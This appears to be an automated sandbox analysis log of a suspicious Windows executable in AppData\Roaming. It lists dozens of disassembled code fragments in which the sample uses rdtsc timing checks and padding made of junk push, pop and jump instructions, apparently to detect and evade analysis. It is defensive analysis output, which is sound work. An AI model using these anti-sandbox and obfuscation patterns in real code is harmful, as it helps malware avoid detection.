Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26B33 second address: D26B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D26B37 second address: D26B4F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0E94F51A46h 0x00000008 jbe 00007F0E94F51A46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F0E94F51A46h 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D31F09 second address: D31F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D31F0D second address: D31F11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D45E15 second address: D45E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FC4h 0x00000009 pushad 0x0000000a popad 0x0000000b jp 00007F0E948C9FB6h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D45E36 second address: D45E49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D45CAC second address: D45CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D61915 second address: D6191A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D6191A second address: D61937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FC3h 0x00000009 jnl 00007F0E948C9FB6h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D61937 second address: D6193B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D6193B second address: D61941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D606E0 second address: D606E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D60A28 second address: D60A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D60A2E second address: D60A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0E94F51A4Ah 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F0E94F51A55h 0x00000012 pop edi 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D60A5B second address: D60A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FBFh 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D60D3A second address: D60D4A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jns 00007F0E94F51A46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D60D4A second address: D60D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FC8h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D60D66 second address: D60D70 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D611C6 second address: D611CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D611CC second address: D611D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D611D7 second address: D611DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D63036 second address: D6303A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D688B1 second address: D688D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jnp 00007F0E948C9FC7h 0x0000000e jmp 00007F0E948C9FC1h 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D6896E second address: D68985 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007F0E94F51A46h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D68985 second address: D689F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FC2h 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c and edx, dword ptr [ebp+122D1C73h] 0x00000012 push 00000004h 0x00000014 jne 00007F0E948C9FC6h 0x0000001a call 00007F0E948C9FB9h 0x0000001f jmp 00007F0E948C9FBEh 0x00000024 push eax 0x00000025 jmp 00007F0E948C9FC6h 0x0000002a mov eax, dword ptr [esp+04h] 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 jne 00007F0E948C9FB6h 0x00000037 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D689F7 second address: D68A0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007F0E94F51A46h 0x0000000f popad 0x00000010 popad 0x00000011 mov eax, dword ptr [eax] 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D68A0F second address: D68A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D68CA3 second address: D68CC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D68CC3 second address: D68CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D68CC7 second address: D68CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D6C086 second address: D6C08E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0EFC second address: 4EA0F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0F00 second address: 4EA0F06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E4016C second address: 4E4017C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A4Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E4017C second address: 4E4019F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F0E948C9FC4h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60B5D second address: 4E60B63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60B63 second address: 4E60B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60B67 second address: 4E60B6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60B6B second address: 4E60B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F0E948C9FC2h 0x0000000f pop edi 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0E948C9FC3h 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60B9F second address: 4E60BC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60BC4 second address: 4E60BD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60BD7 second address: 4E60BFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, 72h 0x0000000f mov edi, esi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E6076F second address: 4E6077E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60676 second address: 4E6068C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E6068C second address: 4E606D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 mov edx, 397F1680h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F0E948C9FC2h 0x00000015 xor si, 34C8h 0x0000001a jmp 00007F0E948C9FBBh 0x0000001f popfd 0x00000020 popad 0x00000021 mov dword ptr [esp], ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov di, si 0x0000002a jmp 00007F0E948C9FBAh 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E6046C second address: 4E604A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0E94F51A55h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E604A0 second address: 4E604A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E604A6 second address: 4E604C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E604C5 second address: 4E604C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70121 second address: 4E70125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70125 second address: 4E70142 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70142 second address: 4E70163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0E94F51A52h 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70163 second address: 4E7017A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E7017A second address: 4E7017E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E7017E second address: 4E70182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70182 second address: 4E70188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0DEF second address: 4EA0E34 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0E948C9FC8h 0x00000008 add ch, 00000028h 0x0000000b jmp 00007F0E948C9FBBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 call 00007F0E948C9FC6h 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0E34 second address: 4EA0E8A instructions: 0x00000000 rdtsc 0x00000002 mov ax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F0E94F51A4Ch 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F0E94F51A50h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F0E94F51A4Dh 0x0000001f and si, AE56h 0x00000024 jmp 00007F0E94F51A51h 0x00000029 popfd 0x0000002a mov eax, 4261EBC7h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E801FC second address: 4E8025B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0E948C9FC1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov cx, dx 0x00000016 pushfd 0x00000017 jmp 00007F0E948C9FBFh 0x0000001c xor eax, 71CF5DBEh 0x00000022 jmp 00007F0E948C9FC9h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E8025B second address: 4E80260 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E80260 second address: 4E80294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F0E948C9FBDh 0x0000000a add si, E7F6h 0x0000000f jmp 00007F0E948C9FC1h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E80294 second address: 4E80298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E80298 second address: 4E8029E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E8029E second address: 4E802A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E802A4 second address: 4E80302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c jmp 00007F0E948C9FC6h 0x00000011 popad 0x00000012 and dword ptr [eax], 00000000h 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F0E948C9FBAh 0x0000001c sbb eax, 2055C2A8h 0x00000022 jmp 00007F0E948C9FBBh 0x00000027 popfd 0x00000028 mov edx, eax 0x0000002a popad 0x0000002b and dword ptr [eax+04h], 00000000h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F0E948C9FC1h 0x00000036 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605B9 second address: 4E605BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605BD second address: 4E605C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605C1 second address: 4E605C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605C7 second address: 4E605CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605CD second address: 4E605D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605D1 second address: 4E605F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0E948C9FC2h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605F0 second address: 4E605F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605F4 second address: 4E605FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605FA second address: 4E6065C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F0E94F51A52h 0x00000012 xchg eax, ebp 0x00000013 jmp 00007F0E94F51A50h 0x00000018 mov ebp, esp 0x0000001a jmp 00007F0E94F51A50h 0x0000001f pop ebp 0x00000020 pushad 0x00000021 pushad 0x00000022 mov dh, al 0x00000024 mov cx, dx 0x00000027 popad 0x00000028 call 00007F0E94F51A55h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70C81 second address: 4E70C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FBEh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70C93 second address: 4E70C97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70C97 second address: 4E70CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0E948C9FBCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0E948C9FBAh 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70CBD second address: 4E70CCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70CCC second address: 4E70D19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F0E948C9FBEh 0x00000010 pop ebp 0x00000011 pushad 0x00000012 pushad 0x00000013 mov edi, eax 0x00000015 jmp 00007F0E948C9FC8h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E80068 second address: 4E80080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A54h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E80080 second address: 4E800E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov edi, 69104580h 0x00000010 jmp 00007F0E948C9FC9h 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F0E948C9FC3h 0x00000020 and eax, 38C36A0Eh 0x00000026 jmp 00007F0E948C9FC9h 0x0000002b popfd 0x0000002c mov ah, A3h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E800E5 second address: 4E800EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E800EB second address: 4E800EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
